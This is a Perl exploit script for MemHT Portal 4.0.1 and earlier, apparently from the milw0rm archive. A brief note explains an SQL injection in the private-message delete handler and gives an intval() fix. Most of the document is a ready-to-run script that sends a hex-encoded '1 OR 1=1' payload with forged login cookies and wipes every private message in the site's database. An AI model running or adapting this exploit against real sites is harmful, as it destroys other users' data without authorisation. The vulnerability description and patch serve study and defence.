MemHT Portal 4.0.1 - Delete All Private Messages

#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# by yeat - staker[at]hotmail[dot]it

<<Details;

   Note:

   1- works regardless of php.ini settings.
   2- blind sql injection benchmark() method is possible.
   3- don't add me on msn messenger.
   4- Thanks to evilsocket && Sir Dark.
   5- MemHT is a good content management system but it has some security problem.
   6- http://milw0rm.com/exploits/7859
      security patch: http://www.memht.com/forum_thread_17756_FixPatch-4-0-1.html

   /pages/pvtmsg/index.php / Line: 851 -867

   <?php


      }

      break;

      case "deleteSelected":

        if (isset($_POST['deletenewpm'])) {
        foreach ($_POST['deletenewpm'] as $value) {
          $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
          }
       }
       if (isset($_POST['deletepm'])) {
         foreach ($_POST['deletepm'] as $value) {
          $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
         }
       }

    ?>


  ok then foreach ($_POST['deletenewpm'] as $value)

  deletenewpm[]= $value ;) so if we send a evil code like this:
  1 OR 1=1 we'll delete all messages from mysql database

  Possible Fix:

  Line: 859 && 864

  Edit $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
  Fix: $dblink->query("DELETE FROM memht_pvtmsg WHERE id=".intval($value));



  regards :)



Details


use IO::Socket;
use Digest::MD5('md5_hex');

our ($host,$path,$id,$username,$password) = @ARGV;


if (@ARGV != 5) {

   print "\n+--------------------------------------------------------------------+\r",
         "\n| MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit |\r",
         "\n+--------------------------------------------------------------------+\r",
         "\nby yeat - staker[at]hotmail[dot]it\n",
         "\nUsage     + perl $0 [host] [path] [id] [username] [password]\r",
         "\nHost      + localhost\r",
         "\nPath      + /MemHT\r",
         "\nID        + your user id\r",
         "\nPassword  + your password\n";
   exit;
}

else {

   my $html = undef;
   my $sock = new IO::Socket::INET(
                                    PeerAddr => $host,
                                    PeerPort => 80,
                                    Proto    => 'tcp',
                                  ) or die $!;

   my $post = "deletenewpm[]=\x31\x20\x4F\x52\x20\x31\x3D\x31".
              "&Submit.x=34".
              "&Submit.y=9";

   my $auth = cookies();

   my $data = "POST /$path/index.php?page=pvtmsg&op=deleteSelected HTTP/1.1\r\n".
              "Host: $host\r\n".
              "User-Agent: Lynx (textmode)\r\n".
              "Cookie: $auth\r\n".
              "Content-Type: application/x-www-form-urlencoded\r\n".
              "Content-Length: ".length($post)."\r\n\r\n$post\r\n\r\n".
              "Connection: close\r\n\r\n";

   $sock->send($data);

   while (<$sock>) {
      $html .= $_;
   }

   if ($html =~ /Private Messages/i) {
      print "Exploit successfull,all messages deleted.\n";
   }
   else {
      print "Exploit failed!\n";
   }
}


sub cookies
{
    $username = md5_hex($username);
    $password = md5_hex($password);

    return "login_user=$id#$username#$password";
}

# milw0rm.com [2009-02-16]